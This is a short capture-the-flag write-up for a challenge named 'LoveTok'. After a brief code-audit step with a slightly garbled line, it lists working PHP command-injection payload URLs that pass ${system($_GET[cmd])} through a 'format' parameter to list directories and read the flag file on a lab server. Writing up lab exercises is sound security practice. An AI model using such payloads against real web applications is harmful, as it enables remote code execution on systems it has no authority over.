1. LoveTok
1.1. Code Audit
find url
http://159.65.20.166:31685/?format=rwith info exhibition



1.2. Command Injection
http://159.65.20.166:31685/?format=${system($_GET[cmd])}&cmd=ls

http://159.65.20.166:31685/?format=${system($_GET[cmd])}&cmd=ls ../

http://159.65.20.166:31685/?format=${system($_GET[cmd])}&cmd=cat ../flag8AiQ0